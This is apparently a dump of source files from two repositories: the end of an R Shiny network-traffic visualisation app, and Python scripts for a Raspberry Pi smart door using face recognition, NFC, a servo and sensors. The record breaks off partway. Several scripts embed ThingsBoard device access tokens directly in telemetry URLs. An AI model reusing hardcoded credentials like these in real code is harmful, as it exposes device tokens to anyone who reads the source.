"text": "shinyApp(\n# Define UI for application that draws a histogram\nshinyUI(fluidPage\n (mainPanel\n (tabsetPanel\n (\n \n tabPanel(\"Interactive\",\n plotOutput(\"plot2\", click = \"plot_click\"),\n verbatimTextOutput(\"test\")\n\n ),\n tabPanel(\"Traffic\",\n dataTableOutput(\"test\"))\n )))),\nshinyServer(function(input, output) {\n \n library(plotly)\n library(igraph)\n library(reshape2)\n library(shiny)\n\n ##################################################################################################################################################################### \n \n ##### Tab 3 ###### \n \n ##################################################################################################################################################################### \n library(Cairo)\n library(ggplot2)\n mtcars2 <- mtcars[, c(\"mpg\", \"cyl\", \"disp\", \"hp\", \"wt\", \"am\", \"gear\")]\n output$plot2 <- renderPlot({\n ggplot(mtcars2, aes(wt, mpg)) + geom_point()\n })\n # output$click_info <- renderPrint({\n # # Because it's a ggplot2, we don't need to supply xvar or yvar; if this\n # # were a base graphics plot, we'd need those.\n # nearPoints(mtcars2, input$plot_click, addDist = TRUE)\n # brushedPoints(mtcars2, input$plot1_brush)\n # })\n output$test <- renderPrint({\n #print('Hi')\n input$plot_click\n #print(input$plot1_click)\n #brushedPoints(mtcars2, input$plot1_brush)\n # brushedPoints(mtcars2)\n })\n output$test <- renderDataTable({\n library(kableExtra)\n library(DT)\n library(Cairo)\n \n file_reader <- read.csv(file = \"output.txt\", header = FALSE)\n transpose_step1 <- melt(file_reader)\n transpose_table <- as.data.frame(transpose_step1$value)\n colnames(transpose_table) <- c(\"Traffic\")\n transpose_table$col2 <- cbind(c(1:length(transpose_table$Traffic)))\n datatable(transpose_table, filter = 'top', options = list(pageLength = 5))\n })\n \n \n ##################################################################################################################################################################### \n \n ##### Tab 2 ###### \n \n ##################################################################################################################################################################### \n \n})\n\n\n)\n"
},
{
"alpha_fraction": 0.3339279294013977,
"alphanum_fraction": 0.3374955356121063,
"avg_line_length": 45.71666717529297,
"blob_id": "50ff0b1b166ba80b01e60d6ad951198a8f00d82e",
"content_id": "ca7fa8cda7daef4df1b95f18742f8f8704861af7",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "R",
"length_bytes": 2803,
"license_type": "no_license",
"max_line_length": 95,
"num_lines": 60,
"path": "/app/rstudio-export/Interactive_test/Check_fluidPage/ui.R",
"repo_name": "jeesaugustine/orca_demo",
"src_encoding": "UTF-8",
"text": "#\n# This is the user-interface definition of a Shiny web application. You can\n# run the application by clicking 'Run App' above.\n#\n# Find out more about building applications with Shiny here:\n#\n# http://shiny.rstudio.com/\n#\n\nlibrary(shiny)\nlibrary(plotly)\n# Define UI for application that draws a histogram\nshinyUI(fluidPage\n (mainPanel\n (tabsetPanel\n (\n # Application title\n tabPanel(\"Network Visualization\",\n \n # Sidebar with a slider input for number of bins\n sidebarLayout(\n sidebarPanel(\n selectInput(inputId = \"type\",\n label = \"Type of Graph\",\n choices = c(\"Rene Erdos\",\"P2P-Gnutella\"),\n selected = \"P2P-Gnutella\"),\n selectInput(inputId = \"traffic\",\n label = \"Type of Traffic\",\n choices = c(\"Pareto\",\"Uniform\"),\n selected = \"Uniform\"),\n selectInput(inputId = \"prior\",\n label = \"Type of Prior\",\n choices = c(\"Gravity\",\"Perturbed\"),\n selected = \"Gravity\"),\n numericInput(inputId = \"node\",\n label = \"Number of Nodes\",\n min = 1,\n max = 10000,\n value = 2),\n selectInput(inputId = \"color\",\n label = \"Type of Color\",\n choices = c(\"Red\",\"Green\"),\n selected = \"Red\"),\n submitButton(text = \"Apply Changes\", icon = NULL, width = NULL)\n ),\n \n \n # Show a plot of the generated distribution\n plotlyOutput(\"distPlot\")\n )\n ),\n tabPanel(\"Traffic\",\n dataTableOutput(\"test\")\n ),\n tabPanel(\"Interactive\",\n plotOutput(\"plot2\", click = \"plot_click\"),\n verbatimTextOutput(\"test\")\n \n )\n))))\n"
},
{
"alpha_fraction": 0.44165104627609253,
"alphanum_fraction": 0.45891180634498596,
"avg_line_length": 38.76865768432617,
"blob_id": "26d39ba9c93fa24bfcc713ca69457584ae9570a9",
"content_id": "cb8288cec92962eb14a4af88cf5fe1e5b3d30b5b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "R",
"length_bytes": 5330,
"license_type": "no_license",
"max_line_length": 239,
"num_lines": 134,
"path": "/app/rstudio-export/server.R",
"repo_name": "jeesaugustine/orca_demo",
"src_encoding": "UTF-8",
"text": "#\n# This is the server logic of a Shiny web application. You can run the\n# application by clicking 'Run App' above.\n#\n# Find out more about building applications with Shiny here:\n#\n# http://shiny.rstudio.com/\n#\n\nlibrary(shiny)\n\n# Define server logic required to draw a histogram\nshinyServer(function(input, output) {\n library(reshape2)\n library(plotly)\n library(igraph)\n\n # This command below gives you the topology and the perturbed prior \n # TODO: add other priors (uniform, gravity)\n system(\"python3 network_generator.py\")\n system(\"tr '\\n' , < ./data/b.csv > ./data/b.txt\")\n system(\"awk '{print $2}' ./data/g.csv > ./data/_xp.txt\")\n system(\"cut -c-8 ./data/_xp.txt > ./data/__xp.myytxt\")\n system(\"tr '\\n' , < ./data/__xp.txt > ./data/xp.txt\")\n system(\"cp ./data/a.csv ./data/a.txt\")\n \n # Actual Code to our algorithm main\n # Complile the codes \n system(\"g++ -o direct ./SR/main.cpp\")\n system(\"g++ -o Ddirect ./SR/main_dynamic.cpp\")\n \n # Execution Commands \n system(\"./direct -f ./data/ -o output.txt\")\n system(\"./Ddirect -f ./data/ -o output.txt\")\n \n # f <- read.csv(file = \"edges_with_index_1.csv\", header = FALSE)\n f <- read.csv(file = \"edges.txt\", header = FALSE)\n edges <- c()\n print(dim(f)[1])\n for (e in 1:dim(f)[1]){\n edges <- append(edges, c(f[e, 1], f[e, 2]))\n }\n length(edges)\n # G <- make_graph(edges)\n # G <- graph_from_edgelist(as.matrix(f), directed = TRUE)\n G = graph.data.frame(f, directed=TRUE, vertices=NULL)\n print(length(E(G)))\n print(length(V(G)))\n print(length(E(G)))\n net = G\n lines_df_x <- c()\n lines_df_y <- c()\n lines_df_z <- c()\n l = layout_on_sphere(net)\n list_data <- list(c(V(G)$name))\n for (i in 1:(length(f$V1))){\n p1 <- (f[i, 1])\n p2 <- (f[i, 2])\n p1 <- match(p1, list_data[[1]])\n p2 <- match(p2, list_data[[1]])\n x1 <- (l[p1,1])\n y1 <- (l[p1,2])\n z1 <- (l[p1,3])\n x2 <- (l[p2,1])\n y2 <- (l[p2,2])\n z2 <- (l[p2,3])\n \n lines_df_x <- c(lines_df_x, x1, x2, NA)\n lines_df_y <- c(lines_df_y,y1, y2, NA)\n lines_df_z <- c(lines_df_z,z1, z2, NA)\n \n }\n \n output$distPlot <- renderPlotly(plot_ly(as.data.frame(l), x=l[,1], y = l[,2], z = l[,3], type = 'scatter3d' ) %>% \n add_paths(x=lines_df_x,y=lines_df_y,z=lines_df_z))\n \n##################################################################################################################################################################### \n\n ##### Tab 3 ###### \n \n##################################################################################################################################################################### \n library(Cairo)\n library(ggplot2)\n mtcars2 <- mtcars[, c(\"mpg\", \"cyl\", \"disp\", \"hp\", \"wt\", \"am\", \"gear\")]\n output$plot2 <- renderPlot({\n ggplot(mtcars2, aes(wt, mpg)) + geom_point()\n })\n # output$click_info <- renderPrint({\n # # Because it's a ggplot2, we don't need to supply xvar or yvar; if this\n # # were a base graphics plot, we'd need those.\n # nearPoints(mtcars2, input$plot_click, addDist = TRUE)\n # brushedPoints(mtcars2, input$plot1_brush)\n # })\n output$brush_info <- renderPrint({\n #print('Hi')\n print(input$plot_dblclick)\n #print(input$plot1_click)\n #brushedPoints(mtcars2, input$plot1_brush)\n # brushedPoints(mtcars2)\n })\n\n \n\n##################################################################################################################################################################### \n \n##### Tab 2 ###### \n 
\n##################################################################################################################################################################### \n \n output$test <- renderDataTable({\n library(kableExtra)\n library(DT)\n library(Cairo)\n \n file_reader <- read.csv(file = \"./data/output.txt\", header = FALSE)\n transpose_step1 <- melt(file_reader)\n transpose_table <- as.data.frame(transpose_step1$value)\n colnames(transpose_table) <- c(\"Traffic\")\n transpose_table$sd_id<- cbind(c(1:length(transpose_table$Traffic)))\n datatable(transpose_table, filter = 'top', options = list(pageLength = 5))\n })\n\n #####################################################################################################################################################################\n\n ##### Tab 4 ######\n\n #####################################################################################################################################################################\n\n mat <- read.csv(\"aatThreshCompliment.csv\", header = FALSE)\n mat2 <- read.csv(\"aat.csv\", header = FALSE)\n print(mat)\n output$heatmap <- renderPlotly(heatmaply(mat2, Rowv = FALSE, Colv = FALSE, margins = c(40,40,40,40), showticklabels = FALSE,scale_fill_gradient_fun = ggplot2::scale_fill_gradient2(low = \"white\", high = \"steelblue\"),hide_colorbar=TRUE))\n output$heatmap2 <- renderPlotly(heatmaply(mat, Rowv = FALSE, Colv = FALSE, margins = c(40,40,40,40), showticklabels = FALSE,color=c(\"grey10\",\"steelblue\"),hide_colorbar=TRUE))\n})\n\n"
}
] | 16 |
XeonHis/IoTA
|
https://github.com/XeonHis/IoTA
|
f5c6729d3e3cd91bc112ef5b571a6a88d12ef470
|
d54a045fac8c06fc18b7da8b2559ef90cfa5881a
|
272f43b044f07c30061e732664f9afc4b5571cd4
|
refs/heads/main
| 2023-01-21T23:34:12.490591 | 2020-11-28T08:22:08 | 2020-11-28T08:22:08 | 306,507,712 | 1 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.6561604738235474,
"alphanum_fraction": 0.6934097409248352,
"avg_line_length": 49,
"blob_id": "79d612bd96c77b0f94efeb410071f4227915a6bc",
"content_id": "0260aea0288d0f0bba0f154654c43495ee3e57bb",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 349,
"license_type": "permissive",
"max_line_length": 119,
"num_lines": 7,
"path": "/test/test_curl.py",
"repo_name": "XeonHis/IoTA",
"src_encoding": "UTF-8",
"text": "import requests\n\n# requests.get(\n# 'curl -v -X POST -d \"{\\\"card_no\\\": 25121111}\" https://demo.thingsboard.io/api/v1/iK0zWkznWEoYqBnmAtQf/telemetry '\n# '--header \"Content-Type:application/json\"')\ndata = \"{{\\\"card_no\\\": {}}}\".format('test_post2')\nrequests.post(url='https://demo.thingsboard.io/api/v1/iK0zWkznWEoYqBnmAtQf/telemetry',data=data)"
},
{
"alpha_fraction": 0.46660807728767395,
"alphanum_fraction": 0.5,
"avg_line_length": 21.760000228881836,
"blob_id": "3cb0a1563d8a3d7890e29da522dd7e088a54ba86",
"content_id": "d9b2cd9c6670ff6e3434584c60040acf961c0b26",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1138,
"license_type": "permissive",
"max_line_length": 102,
"num_lines": 50,
"path": "/hall.py",
"repo_name": "XeonHis/IoTA",
"src_encoding": "UTF-8",
"text": "import smbus\nimport time\nimport requests\nimport acceleration\nimport threading\n\n\ndef Print(value):\n if value == 0:\n print('no magnet')\n if value == 1:\n print('magnet north')\n if value == -1:\n print('magnet south')\n\n\ndef hall1():\n address = 0x48\n A0 = 0x40\n\n bus = smbus.SMBus(11)\n status = 0\n\n while True:\n bus.write_byte(address, A0)\n data = bus.read_byte(address)\n if 5 > data - 133 > -5:\n value = 0\n if data < 128:\n value = -1\n if data > 138:\n value = 1\n if value != status:\n if value != -1:\n current_time = time.strftime(\"%Y-%m-%d %H:%M:%S\", time.localtime())\n print('door opened at ', current_time)\n time_payload = '{{\"open_time\": \"{}\"}}'.format(str(current_time))\n requests.post(url='https://demo.thingsboard.io/api/v1/rL2hzO7of5BN0jk1JMuX/telemetry',\n data=time_payload)\n # Print(value)\n status = value\n time.sleep(0.2)\n\n\ndef hall():\n pass\n\n\nif __name__ == '__main__':\n hall()\n"
},
{
"alpha_fraction": 0.61534184217453,
"alphanum_fraction": 0.6336854100227356,
"avg_line_length": 32.943397521972656,
"blob_id": "bc4a86fd535fc6215569f0e9f31354627dbd8d9d",
"content_id": "7edb9093f0029324efdb909722cf2436dc51d521",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1987,
"license_type": "permissive",
"max_line_length": 119,
"num_lines": 53,
"path": "/face_rec.py",
"repo_name": "XeonHis/IoTA",
"src_encoding": "UTF-8",
"text": "# coding = utf-8\nimport face_recognition\nimport cv2\nimport numpy as np\nimport os, sys\nimport time\n\nos.chdir('/home/pi/ZYDEMO/iota')\n\n\n# 创建视频对象\n\n# 加载当前目录下名为'yht.jpg'的照片,照片里需要有且仅有一张脸,这张脸将作为认识的脸\n\n\ndef face_rec(video_capture, camera_get, camera_get_locations):\n # print('loading...')\n # image = face_recognition.load_image_file('yht.jpg')\n # current_location = face_recognition.face_locations(image)\n # current_encoding = face_recognition.face_encodings(image, current_location)\n # video_capture = cv2.VideoCapture('http://192.168.123.122:8080/?action=stream')\n # print(os.getcwd())\n face_list = np.load('face_encoding.npy')\n name_list = np.load('name_encoding.npy')\n\n # print('Capturing image.')\n # 读取一帧照片\n # ret, frame = video_capture.read()\n # 把照片缩小一点,能加快处理速度\n # frame = cv2.resize(frame, (0, 0), fx=0.25, fy=0.25)\n # 将cv2用的BGR颜色转换为face_recognition用的RBG颜色\n # camera_get = frame[:, :, ::-1]\n\n # 获取这一帧图片里所有人脸的位置和特征值\n # camera_get_locations = face_recognition.face_locations(camera_get)\n # print('Found {} faces in image.'.format(len(camera_get_locations)))\n camera_get_encodings = face_recognition.face_encodings(camera_get, camera_get_locations)\n\n for i in range(len(camera_get_encodings)):\n matches = face_recognition.compare_faces(face_list, camera_get_encodings[i], tolerance=0.5)\n\n if True in matches:\n first_match_index = matches.index(True)\n name = name_list[first_match_index]\n # print('I see ', name)\n # cv2.imwrite(r'/home/pi/ZYDEMO/iota/img/' + time.strftime(\"%Y-%m-%d %H:%M:%S\", time.localtime()) + \".jpg\",\n # known)\n return [True, name]\n else:\n return [False, 'None']\n\n# if __name__ == '__main__':\n# face_rec(None)\n"
},
{
"alpha_fraction": 0.5299295783042908,
"alphanum_fraction": 0.6038732528686523,
"avg_line_length": 20.846153259277344,
"blob_id": "b56a945ad4fdaab34c0df759291b80914fc17d84",
"content_id": "59157e427fd862b4733d58e05fdbe1d51604329c",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 568,
"license_type": "permissive",
"max_line_length": 39,
"num_lines": 26,
"path": "/test/gs90_DESKTOP-AJFIKR8_11月-02-073430-2020_Conflict.py",
"repo_name": "XeonHis/IoTA",
"src_encoding": "UTF-8",
"text": "import RPi.GPIO as GPIO\nimport time\nimport signal\nimport atexit\n\natexit.register(GPIO.cleanup)\n\nGPIO.setmode(GPIO.BCM)\nGPIO.setup(16, GPIO.OUT, initial=False)\np = GPIO.PWM(16, 50) # 50HZ\np.start(0)\ntime.sleep(2)\n\nfor _ in range(1):\n for i in range(0, 181, 10):\n p.ChangeDutyCycle(2 + i / 18.)\n time.sleep(0.02)\n p.ChangeDutyCycle(0)\n time.sleep(0.2)\n time.sleep(1)\n print(\"wait\")\n for i in range(181, 0, -10):\n p.ChangeDutyCycle(2 + i / 18.)\n time.sleep(0.02)\n p.ChangeDutyCycle(0)\n time.sleep(0.2)\n"
},
{
"alpha_fraction": 0.6420454382896423,
"alphanum_fraction": 0.6534090638160706,
"avg_line_length": 34.20000076293945,
"blob_id": "04ca363ff9697cd83867c92e11bba10c8d630384",
"content_id": "91d9f061149afd136ee4e5376b4927d77011758b",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 176,
"license_type": "permissive",
"max_line_length": 106,
"num_lines": 5,
"path": "/test/test_camera_check.py",
"repo_name": "XeonHis/IoTA",
"src_encoding": "UTF-8",
"text": "import subprocess\n\noutput = str(subprocess.Popen(['ps -a | grep mjpg'], stdout=subprocess.PIPE, shell=True).communicate()[0],\n encoding='utf8')\nprint(output == '')\n"
},
{
"alpha_fraction": 0.690095841884613,
"alphanum_fraction": 0.7444089651107788,
"avg_line_length": 17.41176414489746,
"blob_id": "cb045148886e06a685665159ba820ff8fd44b8ac",
"content_id": "d29015f727bab542ba7e758e7d33d8a8c8e110a5",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 313,
"license_type": "permissive",
"max_line_length": 30,
"num_lines": 17,
"path": "/d_open.py",
"repo_name": "XeonHis/IoTA",
"src_encoding": "UTF-8",
"text": "import RPi.GPIO as GPIO\nimport time\n\nGPIO.setmode(GPIO.BCM)\ntilt_pin = 27\nGPIO.setup(tilt_pin, GPIO.OUT)\ntilt = GPIO.PWM(tilt_pin, 50)\ntilt.start(0)\ntime.sleep(0.2)\ntilt.ChangeDutyCycle(12.5)\ntime.sleep(2)\ntilt.ChangeDutyCycle(2.5)\ntime.sleep(2)\ntilt.ChangeDutyCycle(0)\ntime.sleep(0.5)\ntilt.stop()\nGPIO.cleanup()\n"
},
{
"alpha_fraction": 0.6520763039588928,
"alphanum_fraction": 0.680134654045105,
"avg_line_length": 24.457143783569336,
"blob_id": "44d3df9a7c42cfd108fb1e1cd40359fec24a0704",
"content_id": "d05bab13dc4c1c84b6cdddf1f204871d2b3aeb24",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 891,
"license_type": "permissive",
"max_line_length": 109,
"num_lines": 35,
"path": "/open.py",
"repo_name": "XeonHis/IoTA",
"src_encoding": "UTF-8",
"text": "import RPi.GPIO as GPIO\nimport time\nimport requests\nimport acceleration\nimport threading\n\n\ndef open_door(current_time):\n open_thread = threading.Thread(target=open_door1(current_time))\n acc_thread = threading.Thread(target=acceleration.plt_data)\n open_thread.start()\n acc_thread.start()\n\n open_thread.join()\n acc_thread.join()\n\n\ndef open_door1(current_time):\n time_payload = '{{\"open_time\": \"{}\"}}'.format(str(current_time))\n requests.post(url='https://demo.thingsboard.io/api/v1/rL2hzO7of5BN0jk1JMuX/telemetry', data=time_payload)\n GPIO.setmode(GPIO.BCM)\n tilt_pin = 27\n GPIO.setup(tilt_pin, GPIO.OUT)\n tilt = GPIO.PWM(tilt_pin, 50)\n tilt.start(0)\n time.sleep(0.2)\n tilt.ChangeDutyCycle(12.5)\n time.sleep(2)\n tilt.ChangeDutyCycle(2.5)\n time.sleep(2)\n tilt.ChangeDutyCycle(0)\n time.sleep(0.5)\n tilt.stop()\n\n # GPIO.cleanup()\n"
},
{
"alpha_fraction": 0.6011612415313721,
"alphanum_fraction": 0.6096471548080444,
"avg_line_length": 30.985713958740234,
"blob_id": "837b3e9a08fd48f6dcd58227681634e0e826ed13",
"content_id": "1028e3354655237a446ae122359a40f93b852262",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2239,
"license_type": "permissive",
"max_line_length": 115,
"num_lines": 70,
"path": "/main.py",
"repo_name": "XeonHis/IoTA",
"src_encoding": "UTF-8",
"text": "import RPi.GPIO as GPIO\nimport time\nfrom open import open_door\n# from ultrasonic import distance\nimport camera_servo\nimport nfc\nimport threading\nimport btn\nimport subprocess\n\n\ndef check_camera():\n camera_flag = str(subprocess.Popen(['ps -a | grep mjpg'], stdout=subprocess.PIPE, shell=True).communicate()[0],\n encoding='utf8')\n if camera_flag == '':\n subprocess.Popen(['sh /home/pi/start/camera/[email protected]'], stdout=subprocess.PIPE, shell=True)\n print(\"camera is not opened, now open at \", time.strftime(\"%Y-%m-%d %H:%M:%S\", time.localtime()))\n time.sleep(5)\n else:\n print(\"camera is opened\")\n\n\ndef main():\n check_camera()\n print(\"door monitor start at \", time.strftime(\"%Y-%m-%d %H:%M:%S\", time.localtime()))\n nfc_thread = threading.Thread(target=nfc.nfc)\n btn_thread = threading.Thread(target=btn.btn_press)\n camera_thread = threading.Thread(target=camera_servo.start_camera)\n\n nfc_thread.start()\n btn_thread.start()\n camera_thread.start()\n\n nfc_thread.join()\n btn_thread.join()\n camera_thread.join()\n\n\n# with open('/home/pi/ZYDEMO/iota/open_detail.txt', 'a') as fp:\n# while True:\n# camera_servo.start_camera()\n# time.sleep(1)\n# btn_pin = 26\n# GPIO.setwarnings(False)\n# GPIO.setmode(GPIO.BCM)\n# GPIO.setup(btn_pin, GPIO.IN, pull_up_down=GPIO.PUD_UP)\n# nfcid = nfc.nfc()\n# nfc_flag = nfc.check(nfcid)\n# if nfc_flag:\n# print('nfc open at ', time.strftime(\"%Y-%m-%d %H:%M:%S\", time.localtime()))\n# open_door()\n# fp.write('nfc ' + nfcid + ' open at ' + str(time.strftime(\"%Y-%m-%d %H:%M:%S\", time.localtime())) + '\\n')\n# fp.flush()\n# time.sleep(2)\n# if GPIO.input(btn_pin) == 0:\n# print('press open at ', time.strftime(\"%Y-%m-%d %H:%M:%S\", time.localtime()))\n# open_door()\n# fp.write('button open at ' + str(time.strftime(\"%Y-%m-%d %H:%M:%S\", time.localtime())) + '\\n')\n# fp.flush()\n# time.sleep(2)\n\n# if camera_servo.start_camera():\n# print('face open at ', time.strftime(\"%Y-%m-%d %H:%M:%S\", time.localtime()))\n# open_door()\n# if distance() < 20:\n# print('ultrasonic open at ', time.strftime(\"%Y-%m-%d %H:%M:%S\", time.localtime()))\n# open_door()\n\nif __name__ == '__main__':\n main()\n"
},
{
"alpha_fraction": 0.6800000071525574,
"alphanum_fraction": 0.7599999904632568,
"avg_line_length": 7.666666507720947,
"blob_id": "a8aff3488c4ee3fa3d4296dfad6ec4e2ac2179ed",
"content_id": "995060466b18c0c48e9a5fece63f4ed819b7a2e4",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 25,
"license_type": "permissive",
"max_line_length": 13,
"num_lines": 3,
"path": "/test/img.py",
"repo_name": "XeonHis/IoTA",
"src_encoding": "UTF-8",
"text": "import cv2\n\ncv2.imwrite()"
},
{
"alpha_fraction": 0.6555891036987305,
"alphanum_fraction": 0.7009063363075256,
"avg_line_length": 18.47058868408203,
"blob_id": "30e22ee07b69d55785ca4451d340b59671f800c3",
"content_id": "9262ab744b21b1c854aa85a3194f974d4041d049",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 331,
"license_type": "permissive",
"max_line_length": 32,
"num_lines": 17,
"path": "/test/test_gs90.py",
"repo_name": "XeonHis/IoTA",
"src_encoding": "UTF-8",
"text": "import RPi.GPIO as GPIO\n\nGPIO.setmode(GPIO.BCM)\ntilt_pin = 27\nGPIO.setup(tilt_pin, GPIO.OUT)\ntilt = GPIO.PWM(tilt_pin, 50)\ntilt.start(0)\ntilt.ChangeDutyCycle(2.5)\ntilt.ChangeDutyCycle(0)\n\n# while True:\n# tilt.ChangeDutyCycle(2.5)\n# tilt.ChangeDutyCycle(7.5)\n# tilt.ChangeDutyCycle(12.5)\n\n# tilt.stop()\n# GPIO.cleanup()\n"
},
{
"alpha_fraction": 0.5335720777511597,
"alphanum_fraction": 0.564010739326477,
"avg_line_length": 20.901960372924805,
"blob_id": "a85352cb4c24a9ad0b7c7f96f0a4cd405f030216",
"content_id": "d252f75d75b54245dcd029565febd5f8a056ba34",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1237,
"license_type": "permissive",
"max_line_length": 65,
"num_lines": 51,
"path": "/ultrasonic.py",
"repo_name": "XeonHis/IoTA",
"src_encoding": "UTF-8",
"text": "import RPi.GPIO as GPIO\nimport time\n\n\ndef distance():\n GPIO.setwarnings(False)\n GPIO.setmode(GPIO.BCM)\n trig, echo = 24, 23\n GPIO.setup(trig, GPIO.OUT)\n GPIO.setup(echo, GPIO.IN)\n # 发送高电平信号到 Trig 引脚\n GPIO.output(trig, True)\n\n # 持续 10 us\n time.sleep(0.00001)\n GPIO.output(trig, False)\n\n start_time = time.time()\n stop_time = time.time()\n\n # 记录发送超声波的时刻1\n while GPIO.input(echo) == 0:\n start_time = time.time()\n\n # 记录接收到返回超声波的时刻2\n while GPIO.input(echo) == 1:\n stop_time = time.time()\n\n # 计算超声波的往返时间 = 时刻2 - 时刻1\n time_elapsed = stop_time - start_time\n # 声波的速度为 343m/s, 转化为 34300cm/s。\n distance = (time_elapsed * 34300) / 2\n\n GPIO.cleanup()\n\n return distance\n\n# print(distance())\n#\n# if __name__ == '__main__':\n# try:\n# while True:\n# dist = distance()\n# print(dist)\n# print(\"Measured Distance = {:.2f} cm\".format(dist))\n# time.sleep(1)\n#\n# # Reset by pressing CTRL + C\n# except KeyboardInterrupt:\n# print(\"Measurement stopped by User\")\n# GPIO.cleanup()\n"
},
{
"alpha_fraction": 0.6381215453147888,
"alphanum_fraction": 0.6878452897071838,
"avg_line_length": 29.25,
"blob_id": "a5c7946e3223572c5441831408bd2a24f53d4665",
"content_id": "84053cb3d0ce6f27cfe207d869e27ebdd4479130",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 362,
"license_type": "permissive",
"max_line_length": 110,
"num_lines": 12,
"path": "/test/test1.py",
"repo_name": "XeonHis/IoTA",
"src_encoding": "UTF-8",
"text": "from pynfc import Nfc, Desfire, Timeout, TimeoutException\n\nn = Nfc(\"pn532_uart:/dev/ttyUSB0:115200\")\n\nDESFIRE_DEFAULT_KEY = b'\\x00' * 8\nMIFARE_BLANK_TOKEN = b'\\xFF' * 1024 * 4\n\nfor target in n.poll():\n try:\n print(target.uid, target.auth(DESFIRE_DEFAULT_KEY if type(target) == Desfire else MIFARE_BLANK_TOKEN))\n except TimeoutException:\n pass"
},
{
"alpha_fraction": 0.5583398342132568,
"alphanum_fraction": 0.6209867000579834,
"avg_line_length": 28.720930099487305,
"blob_id": "4fc786a775dcd38a4bfb3c8b8614a753330f2b4b",
"content_id": "6dbed48832c52e06f3e11120aeee46cc2c77c4ee",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1725,
"license_type": "permissive",
"max_line_length": 57,
"num_lines": 43,
"path": "/test/test_hall.py",
"repo_name": "XeonHis/IoTA",
"src_encoding": "UTF-8",
"text": "import PCF\nimport time\n\n# for RPI version 1, use \"bus = smbus.SMBus(1)\"\n# 0 代表 /dev/i2c-0, 1 代表 /dev/i2c-1 ,具体看使用的树莓派那个I2C来决定\nbus = smbus.SMBus(1) #创建一个smbus实例\n\n#在树莓派上查询PCF8591的地址:“sudo i2cdetect -y 1”\ndef setup(Addr):\n global address\n address = Addr\n\ndef read(chn): #channel\n if chn == 0:\n bus.write_byte(address,0x40) #发送一个控制字节到设备\n if chn == 1:\n bus.write_byte(address,0x41)\n if chn == 2:\n bus.write_byte(address,0x42)\n if chn == 3:\n bus.write_byte(address,0x43)\n bus.read_byte(address) # 从设备读取单个字节,而不指定设备寄存器。\n return bus.read_byte(address) #返回某通道输入的模拟值A/D转换后的数字值\n\ndef write(val):\n temp = val # 将字符串值移动到temp\n temp = int(temp) # 将字符串改为整数类型\n # print temp to see on terminal else comment out\n bus.write_byte_data(address, 0x40, temp)\n #写入字节数据,将数字值转化成模拟值从AOUT输出\n\nif __name__ == \"__main__\":\n setup(0x48)\n #在树莓派终端上使用命令“sudo i2cdetect -y 1”,查询出PCF8591的地址为0x48\n while True:\n print('电位计 AIN0 = ', read(0)) # 电位计模拟信号转化的数字值\n print('光敏电阻 AIN1 = ', read(1)) # 光敏电阻模拟信号转化的数字\n print('热敏电阻 AIN2 = ', read(2)) # 热敏电阻模拟信号转化的数字值\n tmp = read(0)\n tmp = tmp*(255-125)/255+125\n# 125以下LED不会亮,所以将“0-255”转换为“125-255”,调节亮度时灯不会熄灭\n write(tmp)\n time.sleep(2)"
},
{
"alpha_fraction": 0.6258503198623657,
"alphanum_fraction": 0.6925169825553894,
"avg_line_length": 29.625,
"blob_id": "78faa4421723b774d51878bfa7a085fdb78320af",
"content_id": "516319459d1ff38c032ee9e4495ae2345f5c2dc5",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 735,
"license_type": "permissive",
"max_line_length": 69,
"num_lines": 24,
"path": "/test/test.py",
"repo_name": "XeonHis/IoTA",
"src_encoding": "UTF-8",
"text": "from adafruit_pn532.uart import PN532_UART\nimport busio\nimport serial\nimport board\nimport time\n\n# uart = busio.UART(board.TX, board.RX, baudrate=115200, timeout=100)\nuart = serial.Serial(\"/dev/ttyUSB0\",baudrate=115200)\npn532 = PN532_UART(uart, debug=False)\n\nic, ver, rev, support = pn532.firmware_version\nprint(\"Found PN532 with firmware version: {0}.{1}\".format(ver, rev))\npn532.SAM_configuration()\n\nprint(\"Waiting for RFID/NFC card...\")\nwhile True:\n # Check if a card is available to read\n uid = pn532.read_passive_target(timeout=0.5)\n print(\".\", end=\"\")\n # Try again if no card is available.\n if uid is not None:\n print(\"Found card with UID:\", [hex(i) for i in uid])\n pn532.power_down()\n time.sleep(1.0)\n"
},
{
"alpha_fraction": 0.7579618096351624,
"alphanum_fraction": 0.7595541477203369,
"avg_line_length": 40.86666488647461,
"blob_id": "727273e5eaca5e39c53a659385516d1cdbbf5f73",
"content_id": "9d72490aaaa8a74955dec827915ee5b58bc5b350",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 628,
"license_type": "permissive",
"max_line_length": 72,
"num_lines": 15,
"path": "/read_img.py",
"repo_name": "XeonHis/IoTA",
"src_encoding": "UTF-8",
